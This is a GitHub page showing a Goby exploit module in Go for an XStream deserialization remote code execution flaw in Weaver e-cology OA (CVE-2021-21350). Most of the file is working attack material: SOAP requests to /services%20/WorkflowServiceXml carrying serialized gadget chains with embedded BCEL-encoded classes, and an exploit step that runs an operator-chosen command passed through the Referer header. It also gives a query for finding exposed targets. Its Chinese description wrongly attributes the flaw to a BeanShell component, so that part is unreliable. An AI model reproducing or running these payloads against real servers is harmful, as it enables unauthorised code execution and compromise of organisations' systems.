forked from MY0723/goby-poc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWeaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
106 lines (103 loc) · 81 KB
/
Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Weaver e_cology OA XStream Remote Code Execution",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统存在远程代码执行漏洞。该漏洞存在于泛微协同管理应用平台OA系统的BeanShell组件中,该组件为系统自带且允许未授权访问。攻击者通过调用BeanShell组件的问题接口可直接在目标服务器上执行任意命令。",
"Product": "Weaver e-cology",
"Homepage": "https://www.weaver.com.cn/e9",
"Author": "flystart",
"Impact": "<p>攻击者可利用此漏洞造成远程代码执行<br></p>",
"Recommandation": "<p>官方已发布针对此漏洞的修复补丁,受影响用户也可采取下列防护措施对此漏洞进行临时防护。</p>",
"References": [
"https://mp.weixin.qq.com/s/YcCydpGNiCrB0F_w6D5eRw"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami"
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/services%20/WorkflowServiceXml",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
"Content-Type": "text/xml;charset=UTF-8"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n <soapenv:Header/>\n <soapenv:Body>\n <web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$G$S$ced$Y$E$83$5cF$ad$a2$z$gT$aei$C$Ek$8d$40$wm$40$rT$8b$da$daar$m$Da$s$ceL$80$5e$ed$fd$7e$b1$7d$b3$7f$c0$d7$f6et$b5$ab$5d$7d$f6$a5k$b5$P$ed$af$a9$ddg$S$94$I$ad$85$b5$f6$9c$7d$fb$ce$be$9c$b3O$ee$fd$fd$e3$_$A$9e$c6$b7$K$o$YQ0$8a$94$mc2N$wx$G$a7d$3c$cbpZ$BC$9a$e1$8c$82qL$I$cbI$n$c9$c8xN$7c$cf$w$98$c2$f3$82$bc$m$p$cb0$zcFA$U$e7d$9cg$b8$mcVFNA$3b$e6$Y$5eTp$R$97$E$f3$92X$cd$x$b8$8c$x$K$f6$e2$aa$8c$97$c5$f7$VA$ae$J$f2$aa$M$9daAA7$M$86$bc$84$86$93$a6ez$a7$q$d4$c7z$$J$I$8d$dby$$$a19kZ$7c$a6$bc$ba$c0$9d9$7d$a1H$92$a6$9c$a7$h$x$d3z$v$e0$c9$952$60$a0$c5$Z$86E$K$8fb$a2$40$IZ$82$92$b3$cb$8e$c13$a6$f0$8bL$ae$e9$c5$bee$7dMW$RC$P$c3$92$8a$CL$V$cbX$91p$d4$b0W$fb$M$bdl$U$ec$3e$8b$7b$eb$b6$b3$d2W4$5d$8f$5b$7dsF$vg$h$x$dc$a3PV$Y$8a$wVaI$d8$bd$c4$bd$f1$b2$e3p$cb$9b$e5$d7$cb$dc$f5$uZ$B$df_$d4$ad$a5$fe$f1$a2$ee$ba$wl$94$q$b4$3c$U$9f$5bX$e6$86G$f1$aa$b8$OG$85$LOE$Z$c2$f7$9a$c3$dd$92m$b9$3c$a3$hz$9e$M$d6$b0N$v$a9$d8$c0k$w$5e$c7$h$94$D$edy$c91$3d$eeH$d8$V$80$9av$ff$a6$a0$x94$9a$i$9aH$a7$T$89$c1$d1$91$c9$c1d$3c$93$i$l$8fg$86$t$e3$99$c1tb$m$a1$e2M$bcU$B9$cbi$H$a7$s$b2$9c$e7$98$d6$92$E6$cb$X$b9$T$A$s$8c$RC$8f$8f$M$e9$7cX$l$k$d0$e3F$o$c9$87$f3I$p$b1$98L$O$c4$f3$86$8a$b7q$83$w$R$80$94$3d$b3$d8$9f3t$cb$e2$O$c3$3b$w$de$c5$7b$w$de$c7$H$w$3e$c4G$M$l$ab$f8$E$9f$8a$da$7f$s$a1$eejZ$c5$e7$f8B$c5$97$f8J$c5$d7$b8$v$B$SZ$l$863$b9a$f0$92g$da$96$8ao$d0C$e7A$b4OB$e7C$L$87$_$W$a9$96$fd$d3$dc$x$d8t$80$3a$b6$ab2$s$_$e6k$b2$9c$x8$94$3a$9d$o$a3$d2$baM$7eO$ac$t$fb$a8$d5$98$846$d1d$db$f2$f8$86$X44kW$ea$a6$d5$98oQ$J$9f$j$VT$f7$o$z$C$89$84$eeX$f6$d1$ca$8fmC$i$ab$f4j3$bf$d3$3b$f8$5c$d9$e6$b3$V$a5$b6B$E$d7$60Zk$f6$K$5d$86$d1$adX$953Y$83U$V$f5l$XI$90EM$wi$b4n$_$D$Z4$91A$ae$5c$e2$8eQ$b1j$n$7e$82$T$e3$f0$7c$b5$p$bd$8f$c9$bf$a6$81$C$d2$e5$5e$da0$b8$eb$9a$c1$Q$I$c5$$$8b$nQO$c8$S$8e$ec$90$cc$8e$91$87$d7$c5U$a1$O$ed$b4$3b$c1$v$ae$a7$3b$9e$7b$c9$f4$K$ffbty$f3$b4$H$d2$d9$b2$e5$99$ab$E$a8P$i$P$98$b6$9a$a2T$c5$a2$97ny$c1$ad$5e$b2$b6$d8T$cfvx$ca$8bop$83$a6$d1c$cas$de$b1E$z$c6j$a2$a9$Ki2P4SV$a9$ec$91$t$d7W$e9flFD$d3b$8b$82$dc$3bc$3b$wD1$d4$b2$cb$tx$d1$5c$adL$97$ff$Ii$eb$cd$tLV$d0$dd$Z$ba0$c1$q$a7$82$85$ac$80$a9$bda$P2n$$$d1$c2$Lf$fa$9c$a3$h$i$87p$94$9e$m$f1$t$d1$3fMj$a2$c7$88$f9$k$Nh$q$e9_$c7$ee$40$ba$8b$3a$l$f5$d1$90$8fp$f6x$b4$a1$feg0$l$f2$f4$J$89V$R$l$caL$af$8fF$lj$b4$c9$c7$aeTH$L$91e$b3$W$oiK$w$ac$85I$Z$dd$5duJ5h$NZ$b8$ea$f7$x$a2$v$a6$b1h$ab$8f$3d$C$o$da$W$o$ab$f9$fah$7bN$98$ca$9a$dcK$82$I$J$3ar$81y$7b$w$a2E$a2$9d$3e$b4$5b$Y$f9$J$7b$e7$efb$9f$Wi$e9$f2$b1$df$c7$T$3e$O$dc$c1$c1$uq$87R$8a$c64$c5$c7$e1$5bh$U$df$to$p$i$7d$8a$b6$b9$N9$7b$dc$c7$91$l$u$cf$Q$7e$c3$ef$f4$o$d6$e18e$3a$83V$a2$wIw$a1$F$cd$d8G$b4$h$bb$R$a7$d7w$94ti$ec$c1$F$b4A$a7$f7$b6$80$O$9a$ee$9d$b8$J$N$df$91$e5$5d$ec$t$ac$$B$3b$80$3fp$Q$7f$e20N$Q$da2$c2$f7q$P$8d$M$bd$M$7d$M$fd$M$D$M$83$B$a5$f5P$40$e3$8c$7e3H$c4$dd$a7$98$fe$87i$5d$c0$c5$efS$dc$e4$d5$L$f1$U$tB$e4$9b$a4$j$eb0$fc$P$y$j$c8$d7$88$I$A$A
</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                    </key>
                  </defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
        <java.util.Collections_-SynchronizedCollection>
          <default>
            <c class="set"></c>
            <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
          </default>
        </java.util.Collections_-SynchronizedCollection>
      </domains>                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue></web:string>\n <web:string>2</web:string>\n </web:doCreateWorkflowRequest>\n </soapenv:Body>\n</soapenv:Envelope>\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "62962DAA55198E163F6CC3F7E3F1A505",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/services%20/WorkflowServiceXml",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
"Content-Type": "text/xml;charset=UTF-8",
"Referer": "5c8ca382ae7a70a3c56e7d6c5f6603dc{{{cmd}}}"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n <soapenv:Header/>\n <soapenv:Body>\n <web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dU$ebS$TW$U$ff$z$q$dc$cd$b2$I$E$Q$a2U$b1$z$g$E$S$K$f2$K$d6$8a$3c$w6$m$rT$Em$ed$b2$b9$c0B$d8$8d$fb$A$fa$7e$bf$9f3$fd$e4$l$d0$f1$b3_V$a7$9dv$3a$d3$_N$db$P$ed$3fTz$ee$s$I1$b46$99$b9$7b$cf$f3$fe$ce9$f7$9c$fb$db$df$3f$fc$M$e0$y$beU$Q$c1$80$82A$M$89$r$rcX$c19$3c$x$e3$3c$c3s$K$Y$$0$8c$u$b8$88Q$a19$s8$e32$s$c4$f7y$F$970$v$96$cb2$5e$60H$cb$98b$98$96qE$c6$8c$82F$bc$c80$ab$m$839A$bc$qvW$V$cc$e3$9a$82$W$y$c8X$U$df$ebb$b9$n$96$97e$bc$a2$m$8a$9b$M$af$wx$g$g$c3$92$84$aas$86i$b8$e7$rT$c6$db$afJ$I$8dZY$$$a16m$98$7c$da$dbX$e2$f6$9c$b6$94$pNM$c6$d5$f4$f5$v$z$l$d0dJ$f0$Zt$C$cf$90$rl$E$8c$d0$90k$JJ$c6$f2l$9dO$Y$c2N$k$bf6$93X$d365$V$a7$Rg$e0$w$96$b1$a2b$V$86$84$d3$ba$b5$91$d05O_$b5$S$sw$b7$y$7b$3d$913$i$97$9b$899$3d$9f$b1$f4u$ee$S$92u$865$V$eb$c8I$a8_$e1$ee$a8g$db$dctg$f9$z$8f$3b$$$81$V$ee$939$cd$5cI$8e$e64$c7Q$b1$BSB$dd$k$fb$ca$d2$g$d7$5d$82$ab$c2B$5e$c5$z$d8$w$i$d8d$7b$d3$e6N$de2$j$3e$a1$e9Z$96$d0$b9$f0$u$o$V$9b$d8R$b1$8d$d7$qD$e8$ccy$dbp9$e9$l$K$9c$gVr$97$n$84$978Y$da$r$tf$5c$db0W$q$b0Y$be$ccm$nl$ed$d3$Hu$adw$b0G$e3$D$da$40$b7$d6$ab$f7$f5$f3$81l$bf$de$b7$dc$df$df$dd$9b$rl$af$e3$N$8a0p$e2$b9F$$$99$d15$d3$e46$c3$9b$w$de$c2$db$w$de$c1$bb$w$de$c3$fb$M$l$a8$f8$Q$l$89$9c$7e$y$a1$e2$c6$88$8aO$f0$a9$8a$cf$f0$b9$8a$_$f0$a5$E$a8$f8$K_Kh$d8$c34$be$ad$f3$bckX$a6$8ao$Q$a7$8aSi$q$b4$ec$v$d8$7c9GyJNqw$d5$caJh$$$XM$Y$3c$97$z$89tn$d5$a6$f0$e9$82$e8$85$b2$ec$d2$8d$f1$f6$f4$a3Z$c3$S$9aD$B$z$d3$e5$dbnP$ac$b4U$c8$5d$acD$7d$9fH$d8$i$u$a0$dc$e7h$Tp$q$b4$c5$d3$8ff$7f$b8$cc$e3p$a1$5e$bb$f1$5d8$c0$e6z$99$cd$7e$_$a5$Z$owU$86$b9i$ad$d3$3d$l$da$ef$abp$dfJ$7c$VY$ed$e5$y$ea$R$91$93B$Y$N$e5i$m$85$gR$c8xyn$eb$F$ad$3a$a2$c78$R6$cf$W$x$d2$f5$98$f8K$K$u$5c$3a$dc$j$d1u$ee8F$d0$df$a1$f8$a2$e8$ffJ$f2$y$e1$d4$B$c1$i$88$5cq$5c$cdv$9dy$c3$5d$a52$j$Eaq$f7F$H$dcY$cft$8d$N$3aN$a1s$k$SM$rA$X$d9$a2V$8e$b7$e4$U$h$a9$v$3e$d9$5e$ee$9ep$f3m$ae$d3$qyL$f83$b6$rb$j$$ASdRW$T$9aI3$ef$b9d$c9$b5$N$ba$f9$bb$88$a8$d3$f7$J$c8$bc$r$7e$a0$40$e4N$f5$i$3e$c6s$c6Fa2$fc$H$a4$fd$ddM$3e$d9$aa$e6LSC$EC$98$S$W2$D$a2$b4$83$kF$i$de$S$a3$e7_$d2M0j$f3$b4u$83q$3dgk$3a$c7I$9c$a2$a7E$fc$q$fa$d3$U$a6$b5$9d$88$efQ$85j$e2$feu$e6$k$a4$fb$a8$f0Q$Z$N$f9$I$a7$3b$a2U$95$3f$81$f9$90$a7$3a$r$daE$7c$u$d3$5d$3e$aa$7d$a8$d1$g$l$87R$a1X$884kc$n$e2$d6$a5$c2$b10$J$a3$f5E$a3TU$ac$w$W$$$da$fd$82h$8a$J$dbhC$88$c4$L$95$d1$c6$8c$d0$91cr$X1$o$c4h$ca$Ez$8d$a9H$y$S$3d$ec$a3$f96$G$7fD$cb$c2$7d$c4b$91$baV$lG$7c$i$f5$f1$c4$3d$i$8b$k$f7q$o$a5$c4XL$f1$d1z$h$d5$e2$7b$f2$O$c2$d1$t$7d$3cu$Hr$ba$c3G$db$5d$K0$84$H$f8$9d$5e$b9$K$9c$a1$Q$_$d3$bb$tFb$I$87P$87Z$i$a5$b5$N$f5$e8$r$fe$Q$g0$o$5eS4A$c3axh$a69$da$82$efp$EwI$f3$BN$90$a7c$f8$D$c7$f1$t$r$b3$83$3c$ad$n$bc$83_Q$cd$d0$c9$d0$c5$90$60H2t$H$x$ed$9f$J$d6$kF$fe$r$a2v$I$cf$ffP$ad$I$a8$9e$j$c2LV$9d$c0E$86$b3$n$b2$ed$a3$T$x$d0$ff$P$ca$d2$a5$5eU$I$A$A
</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
                  <parent class='sun.misc.Launcher$ExtClassLoader'>
                  </parent>
                  <package2certs class='hashtable'/>
                  <classes defined-in='java.lang.ClassLoader'/>
                  <defaultDomain>
                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                    </key>
                  </defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
        <java.util.Collections_-SynchronizedCollection>
          <default>
            <c class="set"></c>
            <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
          </default>
        </java.util.Collections_-SynchronizedCollection>
      </domains>                  <packages/>
                  <nativeLibraries/>
                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
                  <defaultAssertionStatus>false</defaultAssertionStatus>
                  <classes/>
                  <ignored__packages>
                    <string>java.</string>
                    <string>javax.</string>
                    <string>sun.</string>
                  </ignored__packages>
                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
                    <__path>
                      <paths/>
                      <class__path>.</class__path>
                    </__path>
                    <__loadedClasses/>
                  </repository>
                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue></web:string>\n <web:string>2</web:string>\n </web:doCreateWorkflowRequest>\n </soapenv:Body>\n</soapenv:Envelope>\n"
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-05-21 22:24:07",
"GobyVersion": "1.8.275",
"ExpTips": {
"Type": "",
"Content": ""
},
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"DisclosureDate": "2021-05-22"
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}